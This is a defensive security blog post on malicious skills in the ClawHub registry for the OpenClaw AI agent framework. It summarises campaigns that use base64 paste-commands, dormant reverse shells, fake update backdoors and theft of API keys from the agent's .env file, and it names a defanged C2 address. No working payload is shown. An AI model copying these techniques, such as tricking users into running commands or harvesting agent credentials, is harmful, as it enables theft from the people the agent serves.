5 min read

OpenClaw Malicious Skills: What Security Teams Must Know

OpenClaw - open-source AI agent framework
OpenClaw - open-source AI agent framework Photo by Immo Wegmann / Unsplash

Nearly 900 malicious skills have been identified on ClawHub, the public registry for the OpenClaw AI agent framework (Bitdefender, 2026). That is roughly 20% of all packages in the ecosystem. A separate audit by Koi Security found 341 confirmed malicious entries across multiple campaigns, with the majority delivering Atomic Stealer (AMOS) to macOS systems (Koi Security, 2026).

If your organisation has employees running AI agents on corporate devices, and statistically it does, this is not just another registry poisoning story. You can draw parallels with the npm supply chain problem with system-level permissions bolted on.

Get threat intelligence like this delivered to your inbox. Subscribe to CyberDesserts for practical security insights, no fluff.

What Is OpenClaw?

OpenClaw (formerly known as Clawdbot and Moltbot) is an open-source AI agent framework that crossed 160,000 GitHub stars and 2 million visitors in a single week in early 2026 (Bitdefender, 2026). Users install "skills" from ClawHub, a community registry, to extend what the agent can do: manage files, run terminal commands, query APIs, automate workflows.

The design philosophy prioritises capability over containment. OpenClaw agents typically operate with broad system permissions, including terminal access and full disk access, so they can actually execute tasks on the user's behalf. That permission model is the entire point of the tool. It is also the entire problem.

When a malicious skill gets loaded, it inherits those same system-wide permissions. One bad package gives an attacker the same access the agent itself has.

Same Playbook, Higher Stakes

If you have followed the npm supply chain attacks over the past year, the ClawHub attack patterns will look painfully familiar.

Typosquatting is already in play. Bitdefender identified the handle "aslaep123" mimicking the legitimate user "asleep123" to trick users into trusting malicious skills. The Shai-Hulud npm attack used the same technique to compromise over 796 packages in September 2025.

Registry poisoning at scale mirrors the npm ecosystem's struggles. A single ClawHub user, "hightower6eu," uploaded 354 malicious packages in an automated blitz (Bitdefender, 2026). VirusTotal has now analysed over 3,000 OpenClaw skills and found hundreds with malicious characteristics (VirusTotal, 2026).

Social engineering through install instructions follows the ClickFix pattern. The dominant campaign, codenamed ClawHavoc, uses fake error messages and verification requirements to trick users into pasting base64-encoded commands into their terminal. The technique is identical to the clipboard hijacking attacks that have been escalating across the broader threat landscape.

The critical difference is privilege. A compromised npm package runs code in the context of a Node.js process. A compromised OpenClaw skill runs code with whatever permissions the AI agent has been granted. In most deployments, that means terminal access, file system access, and stored API keys for services like OpenAI, Anthropic, and AWS.

Palo Alto Networks' Unit 42 described it well: OpenClaw combines access to private data, exposure to untrusted content, and the ability to communicate externally. Security researcher Simon Willison calls this combination the "lethal trifecta" that makes AI agents vulnerable by design (Palo Alto Networks, 2026).

Four Attack Patterns Targeting Enterprises

Bitdefender's research identified four distinct campaigns. Each takes a different approach to execution.

  • ClawHavoc (300+ skills): Social engineering via fake error messages. Users paste a base64-encoded command that downloads Atomic Stealer. Exfiltrates credentials, browser data, and crypto wallets.
  • AuthTool: Payload stays dormant until the user issues a specific prompt. A skill posing as a Polymarket data tool establishes a persistent reverse shell when triggered by a natural language query.
  • Hidden Backdoor: Executes during skill installation by displaying a fake "Apple Software Update" message while silently establishing an encrypted tunnel to the attacker's infrastructure.
  • Credential Exfiltration: Targets OpenClaw's own configuration files at ~/.clawdbot/.env, harvesting plain-text API keys for cloud services and AI platforms.

The AuthTool campaign is particularly concerning for enterprise environments. The malware activates only when the user interacts with the agent naturally. Traditional static analysis of the skill's code would not flag it because the malicious function sits inside an otherwise legitimate script.

Shadow AI Makes This an Enterprise Problem

Bitdefender's telemetry, drawn specifically from business environments, confirms what most security teams suspect: employees are deploying OpenClaw on corporate devices using single-line install commands. No approval process. No security review. No visibility for the SOC.

This is Shadow AI in its most dangerous form. The AI Acceptable Use Policy guide covers why governance matters here, but the short version is this: 63% of organisations that experienced AI-related breaches lacked AI governance policies (IBM, 2025). OpenClaw on a managed endpoint with broad permissions and a malicious skill installed is not a hypothetical risk. Bitdefender is seeing it in production.

What Security Teams Should Do Now

1. Discover and inventory. Run an endpoint query to find OpenClaw installations. Bitdefender recommends using osquery: SELECT pid, name, path, cmdline FROM processes WHERE name LIKE '%openclaw%';. Treat any discovery as a potential incident requiring investigation.

2. Update your AI Acceptable Use Policy. If your policy does not explicitly address locally installed AI agent frameworks, it has a gap. OpenClaw is different from browser-based AI tools because it executes code directly on the host operating system.

3. Block or monitor ClawHub traffic. Add ClawHub domains to your web proxy monitoring. If outright blocking is too aggressive for your environment, at minimum alert on downloads from the registry so your security team has visibility.

4. Treat this like any supply chain risk. The same principles that protect your npm dependencies apply here: vet packages before installation, monitor for unexpected network connections, rotate any credentials that may have been exposed.

5. Brief your teams. The social engineering in these campaigns is effective precisely because users trust their AI assistant. A skill that says "run this command to fix a compatibility issue" feels different from a phishing email, but the outcome is identical.

Summary

OpenClaw's malicious skills problem is not new in principle. Registry poisoning, typosquatting, and social engineering through install instructions have plagued npm, PyPI, and every other package ecosystem for years. What makes this different is the permission model. AI agents that can read files, execute terminal commands, and access credentials create an attack surface that traditional package managers never had.

For security teams, this is a concrete example of why AI security governance needs to extend beyond chatbot policies to cover locally installed agent frameworks. The threat is not theoretical. Bitdefender is already seeing it in enterprise telemetry.

Discover, inventory, and set policy now. The next ClawHub campaign is probably already being uploaded.

AI agent security is evolving weekly. Subscribers get notified when new threats emerge, plus practical security content covering tools, frameworks, and hands-on techniques. No sales pitches, no fluff.


Last updated: February 2026

References and Sources

  1. Bitdefender Labs (Zugec, M.). (2026). Technical Advisory: OpenClaw Exploitation in Enterprise Networks. Analysis of ~400 malicious ClawHub packages across four attack campaigns. Nearly 900 malicious skills identified via AI Skills Checker.
  2. Koi Security (Yomtov, O.). (2026). ClawHub Malicious Skills Audit. Security audit of 2,857 ClawHub skills identified 341 malicious entries, 335 tied to the ClawHavoc campaign delivering Atomic Stealer.
  3. VirusTotal. (2026). From Automation to Infection: How OpenClaw AI Agent Skills Are Being Weaponized. Analysis of 3,016+ OpenClaw skills with hundreds showing malicious characteristics. Single user "hightower6eu" linked to 314+ malicious packages.
  4. Snyk. (2026). From SKILL.md to Shell Access in Three Lines of Markdown. Analysis of the "lethal trifecta" risk model for AI agent skills, referencing Simon Willison's framework.
  5. Palo Alto Networks. (2026). OpenClaw threat analysis referencing "lethal trifecta" of AI agent risks: private data access, untrusted content exposure, and external communication capability.
  6. IBM Security. (2025). Cost of a Data Breach Report 2025. 63% of breached organisations lacked AI governance policies. Shadow AI in 20% of breaches added $670,000 to costs.
  7. OpenSourceMalware (McCarty, P. / 6mile). (2026). Reporting on ClawHavoc campaign targeting OpenClaw and Claude Code users, January 27 to February 2, 2026. All skills shared C2 infrastructure at 91.92.242[.]30.